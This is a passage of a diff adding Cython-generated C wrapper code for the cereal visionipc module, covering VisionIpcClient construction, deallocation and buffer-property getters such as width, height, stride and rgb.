__pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcServer.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_14__setstate_cython__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_14__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "self.server cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "self.server cannot be converted to a Python object for pickling" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_self_server_cannot_be_converted, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.server cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.server cannot be converted to a Python object for pickling" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcServer.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":101 + * cdef VisionIpcBufExtra extra + * + * def __cinit__(self, string name, VisionStreamType stream, bool conflate): # <<<<<<<<<<<<<< + * self.client = new cppVisionIpcClient(name, stream, conflate, NULL, NULL) + * + */ + +/* Python wrapper */ +static int __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + std::string __pyx_v_name; + enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType __pyx_v_stream; + bool __pyx_v_conflate; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_name,&__pyx_n_s_stream,&__pyx_n_s_conflate,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_name)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 101, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_stream)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 101, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 1, 3, 3, 1); __PYX_ERR(0, 101, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_conflate)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 101, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 1, 3, 3, 2); __PYX_ERR(0, 101, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__cinit__") < 0)) __PYX_ERR(0, 101, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + } + __pyx_v_name = __pyx_convert_string_from_py_std__in_string(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 101, __pyx_L3_error) + __pyx_v_stream = ((enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType)__Pyx_PyInt_As_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(values[1])); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 101, __pyx_L3_error) + __pyx_v_conflate = __Pyx_PyObject_IsTrue(values[2]); if (unlikely((__pyx_v_conflate == ((bool)-1)) && PyErr_Occurred())) __PYX_ERR(0, 101, __pyx_L3_error) + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__cinit__", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 101, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient___cinit__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)__pyx_v_self), __PYX_STD_MOVE_IF_SUPPORTED(__pyx_v_name), __pyx_v_stream, __pyx_v_conflate); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient___cinit__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self, std::string __pyx_v_name, enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType __pyx_v_stream, bool __pyx_v_conflate) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":102 + * + * def __cinit__(self, string name, VisionStreamType stream, bool conflate): + * self.client = new cppVisionIpcClient(name, stream, conflate, NULL, NULL) # <<<<<<<<<<<<<< + * + * def __dealloc__(self): + */ + __pyx_v_self->client = new VisionIpcClient(__pyx_v_name, ((enum VisionStreamType)__pyx_v_stream), __pyx_v_conflate, NULL, NULL); + + /* "cereal/visionipc/visionipc_pyx.pyx":101 + * cdef VisionIpcBufExtra extra + * + * def __cinit__(self, string name, VisionStreamType stream, bool conflate): # <<<<<<<<<<<<<< + * self.client = new cppVisionIpcClient(name, stream, conflate, NULL, NULL) + * + */ + + /* function exit code */ + __pyx_r = 0; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":104 + * self.client = new cppVisionIpcClient(name, stream, conflate, NULL, NULL) + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * del self.client + * + */ + +/* Python wrapper */ +static void __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_3__dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_3__dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_2__dealloc__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_2__dealloc__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":105 + * + * def __dealloc__(self): + * del self.client # <<<<<<<<<<<<<< + * + * @property + */ + delete __pyx_v_self->client; + + /* "cereal/visionipc/visionipc_pyx.pyx":104 + * self.client = new cppVisionIpcClient(name, stream, conflate, NULL, NULL) + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * del self.client + * + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "cereal/visionipc/visionipc_pyx.pyx":107 + * del self.client + * + * @property # <<<<<<<<<<<<<< + * def width(self): + * return self.client.buffers[0].width if self.client.num_buffers else None + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_5width_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_5width_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_5width___get__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_5width___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":109 + * @property + * def width(self): + * return self.client.buffers[0].width if self.client.num_buffers else None # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + if ((__pyx_v_self->client->num_buffers != 0)) { + __pyx_t_2 = __Pyx_PyInt_FromSize_t((__pyx_v_self->client->buffers[0]).width); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 109, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_1 = __pyx_t_2; + __pyx_t_2 = 0; + } else { + __Pyx_INCREF(Py_None); + __pyx_t_1 = Py_None; + } + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":107 + * del self.client + * + * @property # <<<<<<<<<<<<<< + * def width(self): + * return self.client.buffers[0].width if self.client.num_buffers else None + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.width.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":111 + * return self.client.buffers[0].width if self.client.num_buffers else None + * + * @property # <<<<<<<<<<<<<< + * def height(self): + * return self.client.buffers[0].height if self.client.num_buffers else None + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_6height_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_6height_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_6height___get__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_6height___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":113 + * @property + * def height(self): + * return self.client.buffers[0].height if self.client.num_buffers else None # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + if ((__pyx_v_self->client->num_buffers != 0)) { + __pyx_t_2 = __Pyx_PyInt_FromSize_t((__pyx_v_self->client->buffers[0]).height); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 113, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_1 = __pyx_t_2; + __pyx_t_2 = 0; + } else { + __Pyx_INCREF(Py_None); + __pyx_t_1 = Py_None; + } + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":111 + * return self.client.buffers[0].width if self.client.num_buffers else None + * + * @property # <<<<<<<<<<<<<< + * def height(self): + * return self.client.buffers[0].height if self.client.num_buffers else None + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.height.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":115 + * return self.client.buffers[0].height if self.client.num_buffers else None + * + * @property # <<<<<<<<<<<<<< + * def stride(self): + * return self.client.buffers[0].stride if self.client.num_buffers else None + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_6stride_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_6stride_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_6stride___get__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_6stride___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":117 + * @property + * def stride(self): + * return self.client.buffers[0].stride if self.client.num_buffers else None # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + if ((__pyx_v_self->client->num_buffers != 0)) { + __pyx_t_2 = __Pyx_PyInt_FromSize_t((__pyx_v_self->client->buffers[0]).stride); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 117, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_1 = __pyx_t_2; + __pyx_t_2 = 0; + } else { + __Pyx_INCREF(Py_None); + __pyx_t_1 = Py_None; + } + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":115 + * return self.client.buffers[0].height if self.client.num_buffers else None + * + * @property # <<<<<<<<<<<<<< + * def stride(self): + * return self.client.buffers[0].stride if self.client.num_buffers else None + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.stride.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":119 + * return self.client.buffers[0].stride if self.client.num_buffers else None + * + * @property # <<<<<<<<<<<<<< + * def uv_offset(self): + * return self.client.buffers[0].uv_offset if self.client.num_buffers else None + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_9uv_offset_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_9uv_offset_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_9uv_offset___get__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_9uv_offset___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":121 + * @property + * def uv_offset(self): + * return self.client.buffers[0].uv_offset if self.client.num_buffers else None # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + if ((__pyx_v_self->client->num_buffers != 0)) { + __pyx_t_2 = __Pyx_PyInt_FromSize_t((__pyx_v_self->client->buffers[0]).uv_offset); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 121, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_1 = __pyx_t_2; + __pyx_t_2 = 0; + } else { + __Pyx_INCREF(Py_None); + __pyx_t_1 = Py_None; + } + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":119 + * return self.client.buffers[0].stride if self.client.num_buffers else None + * + * @property # <<<<<<<<<<<<<< + * def uv_offset(self): + * return self.client.buffers[0].uv_offset if self.client.num_buffers else None + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.uv_offset.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":123 + * return self.client.buffers[0].uv_offset if self.client.num_buffers else None + * + * @property # <<<<<<<<<<<<<< + * def rgb(self): + * return self.client.buffers[0].rgb if self.client.num_buffers else None + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_3rgb_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_3rgb_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_3rgb___get__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_3rgb___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":125 + * @property + * def rgb(self): + * return self.client.buffers[0].rgb if self.client.num_buffers else None # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + if ((__pyx_v_self->client->num_buffers != 0)) { + __pyx_t_2 = __Pyx_PyBool_FromLong((__pyx_v_self->client->buffers[0]).rgb); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 125, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_1 = __pyx_t_2; + __pyx_t_2 = 0; + } else { + __Pyx_INCREF(Py_None); + __pyx_t_1 = Py_None; + } + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":123 + * return self.client.buffers[0].uv_offset if self.client.num_buffers else None + * + * @property # <<<<<<<<<<<<<< + * def rgb(self): + * return self.client.buffers[0].rgb if self.client.num_buffers else None + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.rgb.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":127 + * return self.client.buffers[0].rgb if self.client.num_buffers else None + * + * @property # <<<<<<<<<<<<<< + * def buffer_len(self): + * return self.client.buffers[0].len if self.client.num_buffers else None + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_10buffer_len_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_10buffer_len_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_10buffer_len___get__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_10buffer_len___get__(struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "cereal/visionipc/visionipc_pyx.pyx":129 + * @property + * def buffer_len(self): + * return self.client.buffers[0].len if self.client.num_buffers else None # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + if ((__pyx_v_self->client->num_buffers != 0)) { + __pyx_t_2 = __Pyx_PyInt_FromSize_t((__pyx_v_self->client->buffers[0]).len); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 129, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_1 = __pyx_t_2; + __pyx_t_2 = 0; + } else { + __Pyx_INCREF(Py_None); + __pyx_t_1 = Py_None; + } + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/visionipc/visionipc_pyx.pyx":127 + * return self.client.buffers[0].rgb if self.client.num_buffers else None + * + * @property # <<<<<<<<<<<<<< + * def buffer_len(self): + * return self.client.buffers[0].len if self.client.num_buffers else None + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("cereal.visionipc.visionipc_pyx.VisionIpcClient.buffer_len.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/visionipc/visionipc_pyx.pyx":131 + * return self.client.buffers[0].len if self.client.num_buffers else None + * + * @property # <<<<<<<<<<<<<< + * def num_buffers(self): + * return self.client.num_buffers + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_11num_buffers_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_11num_buffers_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_11num_buffers___get__(((struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject 